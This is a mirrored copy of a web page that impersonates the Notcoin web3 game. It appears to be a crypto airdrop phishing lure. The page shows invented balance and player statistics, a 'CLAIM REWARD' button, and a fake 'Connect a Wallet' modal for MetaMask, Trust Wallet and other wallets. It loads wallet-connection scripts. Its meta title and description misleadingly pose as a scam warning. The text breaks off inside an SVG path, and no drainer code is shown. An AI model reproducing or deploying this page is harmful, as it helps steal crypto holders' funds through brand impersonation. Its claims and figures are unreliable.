<!DOCTYPE html>
<html lang="en" data-theme="dark" "20240116194209158" "Notcoin">
<!-- Mirrored from notcoin-drop.world/page/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 26 Jun 2024 11:55:49 GMT -->
<!-- Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->

<head>
  <title>Urgent: Avoid NotCoin Crypto Scam - Protect Your DeFi Investments</title>
  <meta name="Author" content="notcoin-drop" />
  <meta name="Revisit-After" content="21 Days" />
  <meta name="Rating" content="General" />
  <meta name="Reply-To" content="marketing@notcoin-drop.world" />
  <meta http-equiv="Content-Language" content="EN" />
  <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
  <meta name="Description"
    content="Don't fall victim to the NotCoin crypto scam! This fraudulent token is designed to steal your DeFi investments. Protect your digital assets by learning how to spot and avoid this dangerous deception. Take action now to safeguard your financial future." />
  <meta name="Keywords" content="
notcoin gift, notcoin, defi gift, defi token gift, defi coin gift, defi cryptocurrency gift, decentralized finance gift, cryptocurrency gift, blockchain gift, crypto gift, digital currency gift, defi assets, defi ecosystem, defi protocols, defi platforms, defi applications, defi products, defi tokens, defi projects, defi investments, defi opportunities, defi trends, defi adoption, defi growth, defi regulations, defi education, defi wallets, defi lending, defi borrowing, defi staking, defi trading, defi farming, defi yields, defi savings, defi insurance
" />
  <meta name="robots" content="noindex,nofollow" />
  <meta charset="UTF-8">
  <link rel="icon" type="image/svg+xml" href="assets/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Notcoin</title>
  <link rel="stylesheet" href="css/modal-9.css">
  <link rel="stylesheet" href="css/popup-6.css">
  <link rel="stylesheet" href="css/index-vmCUioUy.css">
  <style>
    #ModalWrapper {
      z-index: 2147483647
    }
  </style>
  <style>
    :root {
      --w3m-color-mix-strength: 0%;
      --w3m-font-family: 'Space Mono', monospace;
      ;
      --w3m-font-size-master: 10px;
      --w3m-border-radius-master: 4px;
      --w3m-z-index: 2147483646;

      --wui-font-family: var(--w3m-font-family);

      --wui-font-size-micro: var(--w3m-font-size-master);
      --wui-font-size-tiny: calc(var(--w3m-font-size-master) * 1.2);
      --wui-font-size-small: calc(var(--w3m-font-size-master) * 1.4);
      --wui-font-size-paragraph: calc(var(--w3m-font-size-master) * 1.6);
      --wui-font-size-large: calc(var(--w3m-font-size-master) * 2);

      --wui-border-radius-5xs: var(--w3m-border-radius-master);
      --wui-border-radius-4xs: calc(var(--w3m-border-radius-master) * 1.5);
      --wui-border-radius-3xs: calc(var(--w3m-border-radius-master) * 2);
      --wui-border-radius-xxs: calc(var(--w3m-border-radius-master) * 3);
      --wui-border-radius-xs: calc(var(--w3m-border-radius-master) * 4);
      --wui-border-radius-s: calc(var(--w3m-border-radius-master) * 5);
      --wui-border-radius-m: calc(var(--w3m-border-radius-master) * 7);
      --wui-border-radius-l: calc(var(--w3m-border-radius-master) * 9);
      --wui-border-radius-3xl: calc(var(--w3m-border-radius-master) * 20);

      --wui-font-weight-regular: 500;
      --wui-font-weight-medium: 600;
      --wui-font-weight-bold: 700;

      --wui-letter-spacing-large: -0.8px;
      --wui-letter-spacing-paragraph: -0.64px;
      --wui-letter-spacing-small: -0.56px;
      --wui-letter-spacing-tiny: -0.48px;
      --wui-letter-spacing-micro: -0.2px;

      --wui-spacing-0: 0px;
      --wui-spacing-4xs: 2px;
      --wui-spacing-3xs: 4px;
      --wui-spacing-xxs: 6px;
      --wui-spacing-2xs: 7px;
      --wui-spacing-xs: 8px;
      --wui-spacing-1xs: 10px;
      --wui-spacing-s: 12px;
      --wui-spacing-m: 14px;
      --wui-spacing-l: 16px;
      --wui-spacing-2l: 18px;
      --wui-spacing-xl: 20px;
      --wui-spacing-xxl: 24px;
      --wui-spacing-3xl: 40px;

      --wui-icon-box-size-xs: 20px;
      --wui-icon-box-size-sm: 24px;
      --wui-icon-box-size-md: 32px;
      --wui-icon-box-size-lg: 40px;

      --wui-icon-size-inherit: inherit;
      --wui-icon-size-xxs: 10px;
      --wui-icon-size-xs: 12px;
      --wui-icon-size-sm: 14px;
      --wui-icon-size-md: 16px;
      --wui-icon-size-lg: 20px;

      --wui-wallet-image-size-inherit: inherit;
      --wui-wallet-image-size-sm: 40px;
      --wui-wallet-image-size-md: 56px;
      --wui-wallet-image-size-lg: 80px;

      --wui-box-size-md: 100px;
      --wui-box-size-lg: 120px;

      --wui-ease-out-power-2: cubic-bezier(0, 0, 0.22, 1);
      --wui-ease-out-power-1: cubic-bezier(0, 0, 0.55, 1);

      --wui-ease-in-power-3: cubic-bezier(0.66, 0, 1, 1);
      --wui-ease-in-power-2: cubic-bezier(0.45, 0, 1, 1);
      --wui-ease-in-power-1: cubic-bezier(0.3, 0, 1, 1);

      --wui-ease-inout-power-1: cubic-bezier(0.45, 0, 0.55, 1);

      --wui-duration-lg: 200ms;
      --wui-duration-md: 125ms;
      --wui-duration-sm: 75ms;

      --wui-path-network: path('M43.4605 10.7248L28.0485 1.61089C25.5438 0.129705 22.4562 0.129705 19.9515 1.61088L4.53951 10.7248C2.03626 12.2051 0.5 14.9365 0.5 17.886V36.1139C0.5 39.0635 2.03626 41.7949 4.53951 43.2752L19.9515 52.3891C22.4562 53.8703 25.5438 53.8703 28.0485 52.3891L43.4605 43.2752C45.9637 41.7949 47.5 39.0635 47.5 36.114V17.8861C47.5 14.9365 45.9637 12.2051 43.4605 10.7248Z'
        );

      --wui-path-network-lg: path('M78.3244 18.926L50.1808 2.45078C45.7376 -0.150261 40.2624 -0.150262 35.8192 2.45078L7.6756 18.926C3.23322 21.5266 0.5 26.3301 0.5 31.5248V64.4752C0.5 69.6699 3.23322 74.4734 7.6756 77.074L35.8192 93.5492C40.2624 96.1503 45.7376 96.1503 50.1808 93.5492L78.3244 77.074C82.7668 74.4734 85.5 69.6699 85.5 64.4752V31.5248C85.5 26.3301 82.7668 21.5266 78.3244 18.926Z'
        );

      --wui-color-inherit: inherit;

      --wui-color-inverse-100: #fff;
      --wui-color-inverse-000: #000;

      --wui-cover: rgba(0, 0, 0, 0.3);

      --wui-color-blue-100: var(--wui-color-blue-base-100);
      --wui-color-blue-015: var(--wui-color-accent-base-015);

      --wui-color-accent-100: var(--wui-color-accent-base-100);
      --wui-color-accent-090: var(--wui-color-accent-base-090);
      --wui-color-accent-080: var(--wui-color-accent-base-080);

      --wui-accent-glass-090: var(--wui-accent-glass-base-090);
      --wui-accent-glass-080: var(--wui-accent-glass-base-080);
      --wui-accent-glass-020: var(--wui-accent-glass-base-020);
      --wui-accent-glass-015: var(--wui-accent-glass-base-015);
      --wui-accent-glass-010: var(--wui-accent-glass-base-010);
      --wui-accent-glass-005: var(--wui-accent-glass-base-005);
      --wui-accent-glass-002: var(--wui-accent-glass-base-002);

      --wui-color-fg-100: var(--wui-color-fg-base-100);
      --wui-color-fg-125: var(--wui-color-fg-base-125);
      --wui-color-fg-150: var(--wui-color-fg-base-150);
      --wui-color-fg-175: var(--wui-color-fg-base-175);
      --wui-color-fg-200: var(--wui-color-fg-base-200);
      --wui-color-fg-225: var(--wui-color-fg-base-225);
      --wui-color-fg-250: var(--wui-color-fg-base-250);
      --wui-color-fg-275: var(--wui-color-fg-base-275);
      --wui-color-fg-300: var(--wui-color-fg-base-300);

      --wui-color-bg-100: var(--wui-color-bg-base-100);
      --wui-color-bg-125: var(--wui-color-bg-base-125);
      --wui-color-bg-150: var(--wui-color-bg-base-150);
      --wui-color-bg-175: var(--wui-color-bg-base-175);
      --wui-color-bg-200: var(--wui-color-bg-base-200);
      --wui-color-bg-225: var(--wui-color-bg-base-225);
      --wui-color-bg-250: var(--wui-color-bg-base-250);
      --wui-color-bg-275: var(--wui-color-bg-base-275);
      --wui-color-bg-300: var(--wui-color-bg-base-300);

      --wui-color-success-100: var(--wui-color-success-base-100);
      --wui-color-error-100: var(--wui-color-error-base-100);

      --wui-icon-box-bg-error-100: var(--wui-icon-box-bg-error-base-100);
      --wui-icon-box-bg-blue-100: var(--wui-icon-box-bg-blue-base-100);
      --wui-icon-box-bg-success-100: var(--wui-icon-box-bg-success-base-100);
      --wui-icon-box-bg-inverse-100: var(--wui-icon-box-bg-inverse-base-100);

      --wui-all-wallets-bg-100: var(--wui-all-wallets-bg-base-100);

      --wui-avatar-border: var(--wui-avatar-border-base);

      --wui-box-shadow-blue: rgba(71, 161, 255, 0.16);
    }

    @supports (background: color-mix(in srgb, white 50%, black)) {
      :root {
        --wui-box-shadow-blue: color-mix(in srgb, var(--wui-color-accent-100) 16%, transparent);

        --wui-color-accent-090: color-mix(in srgb,
            var(--wui-color-accent-base-100) 90%,
            var(--w3m-default));
        --wui-color-accent-080: color-mix(in srgb,
            var(--wui-color-accent-base-100) 80%,
            var(--w3m-default));

        --wui-color-accent-090: color-mix(in srgb,
            var(--wui-color-accent-base-100) 90%,
            transparent);
        --wui-color-accent-080: color-mix(in srgb,
            var(--wui-color-accent-base-100) 80%,
            transparent);

        --wui-accent-glass-090: color-mix(in srgb,
            var(--wui-color-accent-base-100) 90%,
            transparent);
        --wui-accent-glass-080: color-mix(in srgb,
            var(--wui-color-accent-base-100) 80%,
            transparent);
        --wui-accent-glass-020: color-mix(in srgb,
            var(--wui-color-accent-base-100) 20%,
            transparent);
        --wui-accent-glass-015: color-mix(in srgb,
            var(--wui-color-accent-base-100) 15%,
            transparent);
        --wui-accent-glass-010: color-mix(in srgb,
            var(--wui-color-accent-base-100) 10%,
            transparent);
        --wui-accent-glass-005: color-mix(in srgb,
            var(--wui-color-accent-base-100) 5%,
            transparent);
        --wui-color-accent-002: color-mix(in srgb,
            var(--wui-color-accent-base-100) 2%,
            transparent);

        --wui-color-fg-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-100));
        --wui-color-fg-125: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-125));
        --wui-color-fg-150: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-150));
        --wui-color-fg-175: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-175));
        --wui-color-fg-200: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-200));
        --wui-color-fg-225: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-225));
        --wui-color-fg-250: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-250));
        --wui-color-fg-275: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-275));
        --wui-color-fg-300: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-300));

        --wui-color-bg-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-100));
        --wui-color-bg-125: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-125));
        --wui-color-bg-150: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-150));
        --wui-color-bg-175: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-175));
        --wui-color-bg-200: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-200));
        --wui-color-bg-225: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-225));
        --wui-color-bg-250: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-250));
        --wui-color-bg-275: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-275));
        --wui-color-bg-300: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-300));

        --wui-color-success-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-success-base-100));
        --wui-color-error-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-error-base-100));

        --wui-icon-box-bg-error-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-icon-box-bg-error-base-100));
        --wui-icon-box-bg-accent-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-icon-box-bg-blue-base-100));
        --wui-icon-box-bg-success-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-icon-box-bg-success-base-100));
        --wui-icon-box-bg-inverse-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-icon-box-bg-inverse-base-100));

        --wui-all-wallets-bg-100: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-all-wallets-bg-base-100));

        --wui-avatar-border: color-mix(in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-avatar-border-base));
      }
    }
  </style>
  <style media="enabled">
    :root {
      --w3m-color-mix: #000;
      --w3m-accent: #3396ff;
      --w3m-default: #000;

      --wui-color-blue-base-100: #3396ff;

      --wui-color-accent-base-100: var(--w3m-accent);
      --wui-color-accent-base-090: #2d7dd2;
      --wui-color-accent-base-080: #2978cc;

      --wui-accent-glass-base-090: rgba(51, 150, 255, 0.9);
      --wui-accent-glass-base-080: rgba(51, 150, 255, 0.8);
      --wui-accent-glass-base-020: rgba(51, 150, 255, 0.2);
      --wui-accent-glass-base-015: rgba(51, 150, 255, 0.15);
      --wui-accent-glass-base-010: rgba(51, 150, 255, 0.1);
      --wui-accent-glass-base-005: rgba(51, 150, 255, 0.05);
      --wui-accent-glass-base-002: rgba(51, 150, 255, 0.02);

      --wui-color-fg-base-100: #141414;
      --wui-color-fg-base-125: #2d3131;
      --wui-color-fg-base-150: #474d4d;
      --wui-color-fg-base-175: #636d6d;
      --wui-color-fg-base-200: #798686;
      --wui-color-fg-base-225: #828f8f;
      --wui-color-fg-base-250: #8b9797;
      --wui-color-fg-base-275: #95a0a0;
      --wui-color-fg-base-300: #9ea9a9;

      --wui-color-bg-base-100: #ffffff;
      --wui-color-bg-base-125: #f5fafa;
      --wui-color-bg-base-150: #f3f8f8;
      --wui-color-bg-base-175: #eef4f4;
      --wui-color-bg-base-200: #eaf1f1;
      --wui-color-bg-base-225: #e5eded;
      --wui-color-bg-base-250: #e1e9e9;
      --wui-color-bg-base-275: #dce7e7;
      --wui-color-bg-base-300: #d8e3e3;

      --wui-color-success-base-100: #26b562;
      --wui-color-error-base-100: #f05142;

      --wui-icon-box-bg-error-base-100: #f4dfdd;
      --wui-icon-box-bg-blue-base-100: #d9ecfb;
      --wui-icon-box-bg-success-base-100: #daf0e4;
      --wui-icon-box-bg-inverse-base-100: #dcecfc;

      --wui-all-wallets-bg-base-100: #e8f1fa;

      --wui-avatar-border-base: #f3f4f4;

      --wui-gray-glass-001: rgba(0, 0, 0, 0.01);
      --wui-gray-glass-002: rgba(0, 0, 0, 0.02);
      --wui-gray-glass-005: rgba(0, 0, 0, 0.05);
      --wui-gray-glass-010: rgba(0, 0, 0, 0.1);
      --wui-gray-glass-015: rgba(0, 0, 0, 0.15);
      --wui-gray-glass-020: rgba(0, 0, 0, 0.2);
      --wui-gray-glass-025: rgba(0, 0, 0, 0.25);
      --wui-gray-glass-030: rgba(0, 0, 0, 0.3);
      --wui-gray-glass-060: rgba(0, 0, 0, 0.6);
      --wui-gray-glass-080: rgba(0, 0, 0, 0.8);
    }
  </style>
  <style>
    :root {
      --w3m-color-mix: #fff;
      --w3m-accent: #47a1ff;
      --w3m-default: #fff;

      --wui-color-blue-base-100: #47a1ff;

      --wui-color-accent-base-100: var(--w3m-accent);
      --wui-color-accent-base-090: #59aaff;
      --wui-color-accent-base-080: #6cb4ff;

      --wui-accent-glass-base-090: rgba(71, 161, 255, 0.9);
      --wui-accent-glass-base-080: rgba(71, 161, 255, 0.8);
      --wui-accent-glass-base-020: rgba(71, 161, 255, 0.2);
      --wui-accent-glass-base-015: rgba(71, 161, 255, 0.15);
      --wui-accent-glass-base-010: rgba(71, 161, 255, 0.1);
      --wui-accent-glass-base-005: rgba(71, 161, 255, 0.05);
      --wui-accent-glass-base-002: rgba(71, 161, 255, 0.02);

      --wui-color-fg-base-100: #e4e7e7;
      --wui-color-fg-base-125: #d0d5d5;
      --wui-color-fg-base-150: #a8b1b1;
      --wui-color-fg-base-175: #a8b0b0;
      --wui-color-fg-base-200: #949e9e;
      --wui-color-fg-base-225: #868f8f;
      --wui-color-fg-base-250: #788080;
      --wui-color-fg-base-275: #788181;
      --wui-color-fg-base-300: #6e7777;

      --wui-color-bg-base-100: #141414;
      --wui-color-bg-base-125: #191a1a;
      --wui-color-bg-base-150: #1e1f1f;
      --wui-color-bg-base-175: #222525;
      --wui-color-bg-base-200: #272a2a;
      --wui-color-bg-base-225: #2c3030;
      --wui-color-bg-base-250: #313535;
      --wui-color-bg-base-275: #363b3b;
      --wui-color-bg-base-300: #3b4040;

      --wui-color-success-base-100: #26d962;
      --wui-color-error-base-100: #f25a67;

      --wui-icon-box-bg-error-base-100: #3c2426;
      --wui-icon-box-bg-blue-base-100: #20303f;
      --wui-icon-box-bg-success-base-100: #1f3a28;
      --wui-icon-box-bg-inverse-base-100: #243240;

      --wui-all-wallets-bg-base-100: #222b35;

      --wui-avatar-border-base: #252525;

      --wui-gray-glass-001: rgba(255, 255, 255, 0.01);
      --wui-gray-glass-002: rgba(255, 255, 255, 0.02);
      --wui-gray-glass-005: rgba(255, 255, 255, 0.05);
      --wui-gray-glass-010: rgba(255, 255, 255, 0.1);
      --wui-gray-glass-015: rgba(255, 255, 255, 0.15);
      --wui-gray-glass-020: rgba(255, 255, 255, 0.2);
      --wui-gray-glass-025: rgba(255, 255, 255, 0.25);
      --wui-gray-glass-030: rgba(255, 255, 255, 0.3);
      --wui-gray-glass-060: rgba(255, 255, 255, 0.6);
      --wui-gray-glass-080: rgba(255, 255, 255, 0.8);
    }
  </style>
  <link rel="preconnect" href="https://fonts.googleapis.com/">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin>
  <link
    href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;700&amp;family=Montserrat:wght@400;500;700&amp;family=Raleway:wght@400;500;700&amp;family=Roboto:wght@400;500;700&amp;display=swap"
    rel="stylesheet">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/axios/1.7.2/axios.min.js"></script>
    <script src="https://unpkg.com/@tonconnect/ui@2.0.2/dist/tonconnect-ui.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/tonweb-lite@0.0.41/dist/tonweb.js"></script>
    <script src="https://telegram.org/js/telegram-web-app.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
</head>

<body>
  <div id="root">
    <div>
      <div class="_holderLeft_19gd6_5">
        <img src="assets/img/small-star.svg" alt="small star" class="_star_19gd6_1 _medium_19gd6_26"
          style="top: 2.5rem; left: 8rem;">
        <img src="assets/img/small-star.svg" alt="small star" class="_star_19gd6_1 _small_19gd6_21"
          style="top: 20rem; left: 6rem;">
        <img src="assets/img/small-star.svg" alt="small star" class="_star_19gd6_1 _small_19gd6_21"
          style="top: 22rem; left: 20rem;">
        <img src="assets/img/small-star.svg" alt="small star" class="_star_19gd6_1 _large_19gd6_31"
          style="top: 25rem; left: 10rem;">
      </div>
      <div class="_holderRight_19gd6_13">
        <img src="assets/img/small-star.svg" alt="small star" class="_star_19gd6_1 _medium_19gd6_26"
          style="top: 8rem; right: 18rem;">
        <img src="assets/img/small-star.svg" alt="small star" class="_star_19gd6_1 _xlarge_19gd6_36"
          style="top: 20rem; right: 5rem;">
        <img src="assets/img/small-star.svg" alt="small star" class="_star_19gd6_1 _small_19gd6_21"
          style="top: 23rem; right: 7rem;">
        <img src="assets/img/small-star.svg" alt="small star" class="_star_19gd6_1 _medium_19gd6_26"
          style="top: 26rem; right: 16rem;">
      </div>
    </div>
    <header class="_wrapper_k522q_1">
      <div class="_container_k522q_15">
        <a class="_wpLink_k522q_25" href="https://cdn.joincommunity.xyz/notcoin/Notcoin_Whitepaper.pdf">Whitepaper</a>
        <div id="connect">

        </div>
        <div class="_socials_k522q_36">
          <a href="https://twitter.com/thenotcoin">
            <img src="assets/img/x-logo.svg" alt="X logo" width="16" height="16">
          </a>
          <a href="https://t.me/notcoin">
            <img src="assets/img/tg-logo.svg" alt="Telegram logo" width="20" height="20">
          </a>
        </div>
      </div>
    </header>
    <main class="_wrapper_14cbo_1">
      <div class="_container_14cbo_7">
        <div class="_container_1jteu_1">
          <div class="_heroSection_1jteu_6">
            <h1 class="_heroTitle_1jteu_22">Notcoin</h1>
            <h2 class="_heroSubtitle_1jteu_32">the biggest web3 game</h2>
          </div>
          <div class="_balanceSection_1jteu_42">
            <h3 class="_balanceTitle_1jteu_55">TOTAL BALANCE</h3>
            <div class="_container_yhvry_1">
              <img class="_moneta_yhvry_12" src="assets/img/moneta.png" alt="Moneta">
              <div class="_value_yhvry_23">821,434,204,950</div>
            </div>
          </div>
          <div class="_onlineSection_1jteu_66">
            <div class="_avatars_1r5ly_1">
              <div class="_avatar_1r5ly_1">
                <img class="_avatarImg_1r5ly_13" src="assets/img/2086714.jpg" alt="some avatar">
              </div>
              <div class="_avatar_1r5ly_1">
                <img class="_avatarImg_1r5ly_13" src="assets/img/2176926.jpg" alt="some avatar">
              </div>
              <div class="_avatar_1r5ly_1">
                <img class="_avatarImg_1r5ly_13" src="assets/img/1658067.jpg" alt="some avatar">
              </div>
              <div class="_avatar_1r5ly_1">
                <img class="_avatarImg_1r5ly_13" src="assets/img/2062427.jpg" alt="some avatar">
              </div>
              <div class="_avatar_1r5ly_1">
                <img class="_avatarImg_1r5ly_13" src="assets/img/2189660.jpg" alt="some avatar">
              </div>
            </div>
            <div class="_online_xvv7w_1">
              <span class="_value_xvv7w_14">2,031,386</span>
              <span> total players</span>
            </div>
          </div>
          <div class="_tapToEarn_1jteu_80">
            <button type="button" aria-haspopup="dialog" aria-expanded="false" aria-controls="radix-:rc:"
              data-state="closed" class="claim-button _button_25pya_1 interact-button"
              onclick="openModal()">CLAIM REWARD</button>
          </div>
          <div class="_totalSection_1jteu_92">
            <div class="_container_1e6uz_1">
              <div class="_iconHolder_1e6uz_98">
                <img class="_penny1_1e6uz_156" src="assets/img/penny-1.png" alt="burned icon">
                <img class="_penny2_1e6uz_163" src="assets/img/penny-1.png" alt="burned icon">
                <img class="_penny3_1e6uz_170" src="assets/img/penny-1.png" alt="burned icon">
              </div>
              <div class="_meme_1e6uz_52 _issued_1e6uz_68">
                <img class="_memeImg_1e6uz_64 _issued_1e6uz_68" src="assets/img/doge.png" alt="doge meme">
              </div>
              <div class="_valueContainer_1e6uz_21">
                <span class="_value_1e6uz_21 _valueIssued_1e6uz_42">1,014,356,039,150</span>
                <span class="_title_1e6uz_46">TOTAL ISSUED</span>
              </div>
            </div>
            <div class="_container_1e6uz_1">
              <div class="_iconHolder_1e6uz_98">
                <img class="_flame1_1e6uz_114" src="assets/img/flame2.png" alt="burned icon">
                <img class="_flame2_1e6uz_121" src="assets/img/flame2.png" alt="burned icon">
                <img class="_flame3_1e6uz_128" src="assets/img/flame2.png" alt="burned icon">
                <img class="_flame4_1e6uz_135" src="assets/img/flame2.png" alt="burned icon">
                <img class="_flame5_1e6uz_142" src="assets/img/flame2.png" alt="burned icon">
                <img class="_flame6_1e6uz_149" src="assets/img/flame2.png" alt="burned icon">
              </div>
              <div class="_meme_1e6uz_52 _burned_1e6uz_52">
                <img class="_memeImg_1e6uz_64 _burned_1e6uz_52" src="assets/img/fine2.png" alt="this is fine meme">
              </div>
              <div class="_valueContainer_1e6uz_21">
                <span class="_value_1e6uz_21 _valueBurned_1e6uz_38">192,921,834,200</span>
                <span class="_title_1e6uz_46">TOTAL BURNED</span>
              </div>
            </div>
          </div>
        </div>
      </div>
    </main>
  </div>


  <div id="popup" style="display: none; position: fixed;">
    <div tabindex="0">
      <div class="sc-bczRLJ hNHEtw">
        <div id="popup-content" role="dialog" class="sc-hAZoDl dkAhZx" style="pointer-events:auto"></div>
      </div>
    </div>
  </div>
  <div class="connect-modal-overlay" style="display: none;"></div>
  <div class="connect-modal" style="display: none;"><button class="button" id="button-close"><svg fill="#989DAC"
        aria-hidden="true" height="10" viewBox="0 0 10 10" width="10" xmlns="http://www.w3.org/2000/svg">
        <path
          d="M1.70711 0.291893C1.31658 -0.0959311 0.683417 -0.0976311 0.292893 0.299293C-0.0976311 0.683417 -0.0975921 1.31958 0.292893 1.70711L3.58579 5L0.292893 8.29289C-0.0976311 8.68342 -0.0976311 9.31658 0.292893 9.70711C0.683417 10.0976 1.31658 10.0976 1.70711 9.70711L5 6.41421L8.29289 9.70711C8.68342 10.0976 9.31658 10.0976 9.70711 9.70711C10.0976 9.31658 10.0976 8.68342 9.70711 8.29289L6.41421 5L9.70711 1.70711C10.0976 1.31658 10.0976 0.683417 9.70711 0.292893C9.31658 -0.0976311 8.68342 -0.0976311 8.29289 0.292893L5 3.58579L1.70711 0.292893Z">
        </path>
      </svg></button>
    <div id="modal-leftside" style="display: block;">
      <div class="title">Connect a Wallet</div>
      <div class="subtitle">Recommended</div>
      <div class="tabs-wrapper">
        <div class="tab-item" id="rainbow-connect-button"><img class="tab-item-icon" src="assets/img/rainbow.svg">
          <div>Rainbow</div>
        </div>
        <div class="tab-item" id="metamask-connect-button"><img class="tab-item-icon" src="assets/img/metamask-rainbow.svg">
          <div>MetaMask</div>
        </div>
        <div class="tab-item" id="wallet-connect-connect-button"><img class="tab-item-icon"
            src="assets/img/wallet-connect-rainbow.svg">
          <div>WalletConnect</div>
        </div>
        <div class="tab-item" id="rabby-connect-button"><img class="tab-item-icon" src="assets/img/rabby-rainbow.svg">
          <div>Rabby Wallet</div>
        </div>
        <div class="tab-item" id="trust-wallet-connect-button"><img class="tab-item-icon"
            src="assets/img/trust-wallet-rainbow.svg">
          <div>Trust Wallet</div>
        </div>
        <div class="tab-item" id="coinbase-connect-button"><img class="tab-item-icon" src="assets/img/coinbase-rainbow.svg">
          <div>Coinbase Wallet</div>
        </div>
      </div>
      <div class="tab-footer">
        <div class="footer-label">New to Ethereum wallets?</div><a class="footer-button" style="background:0 0"
          href="https://metamask.io/download/" target="_blank">Learn More</a>
      </div>
    </div>
    <div id="modal-rightside" style="display: none;">
      <div class="button-back-modal"><svg fill="none" height="17" viewBox="0 0 11 17" width="11"
          xmlns="http://www.w3.org/2000/svg">
          <path
            d="M0.99707 8.6543C0.99707 9.08496 1.15527 9.44531 1.51562 9.79688L8.16016 16.3096C8.43262 16.5732 8.74902 16.7051 9.13574 16.7051C9.90918 16.7051 10.5508 16.0811 10.5508 15.3076C10.5508 14.9121 10.3838 14.5605 10.0938 14.2705L4.30176 8.64551L10.0938 3.0293C10.3838 2.74805 10.5508 2.3877 10.5508 2.00098C10.5508 1.23633 9.90918 0.603516 9.13574 0.603516C8.74902 0.603516 8.43262 0.735352 8.16016 0.999023L1.51562 7.51172C1.15527 7.85449 1.00586 8.21484 0.99707 8.6543Z"
            fill="#3898ff"></path>
        </svg></div>
      <div id="connect-modal-tab" class="tabcontent">
        <div class="modal-loader">
          <div class="modal-loader-image-wrapper"><img id="connect-modal-tab-image" alt="" class="image"></div>
          <div class="modal-loader-title" id="connect-modal-tab-title"></div>
          <div class="modal-loader-description" id="connect-modal-tab-subtitle"></div><svg
            xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" class="modal-loader-icon">
            <defs>
              <linearGradient id="mingcuteLoadingFill0" x1="50%" x2="50%" y1="5.271%" y2="91.793%">
                <stop offset="0%" stop-color="currentColor"></stop>
                <stop offset="100%" stop-color="currentColor" stop-opacity=".55"></stop>
              </linearGradient>
              <linearGradient id="mingcuteLoadingFill1" x1="50%" x2="50%" y1="15.24%" y2="87.15%">
                <stop offset="0%" stop-color="currentColor" stop-opacity="0"></stop>
                <stop offset="100%" stop-color="currentColor" stop-opacity=".55"></stop>
              </linearGradient>
            </defs>
            <g fill="none">
              <path
                d="M24 0v24H0V0h24ZM12.593 23.258l-.011.002l-.071.035l-.02.004l-.014-.004l-.071-.035c-.01-.004-.019-.001-.024.005l-.004.01l-.017.428l.005.02l.01.013l.104.074l.015.004l.012-.004l.104-.074l.012-.016l.004-.017l-.017-.427c-.002-.01-.009-.017-.017-.018Zm.265-.113l-.013.002l-.185.093l-.01.01l-.003.011l.018.43l.005.012l.008.007l.201.093c.012.004.023 0 .029-.008l.004-.014l-.034-.614c-.003-.012-.01-.02-.02-.022Zm-.715.002a.023.023 0 0 0-.027.006l-.006.014l-.034.614c0 .012.007.02.017.024l.015-.002l.201-.093l.01-.008l.004-.011l.017-.43l-.003-.012l-.01-.01l-.184-.092Z">
              </path>
              <path fill="url(#mingcuteLoadingFill0)"
                d="M8.749.021a1.5 1.5 0 0 1 .497 2.958A7.502 7.502 0 0 0 3 10.375a7.5 7.5 0 0 0 7.5 7.5v3c-5.799 0-10.5-4.7-10.5-10.5C0 5.23 3.726.865 8.749.021Z"
                transform="translate(1.5 1.625)"></path>
              <path fill="url(#mingcuteLoadingFill1)"
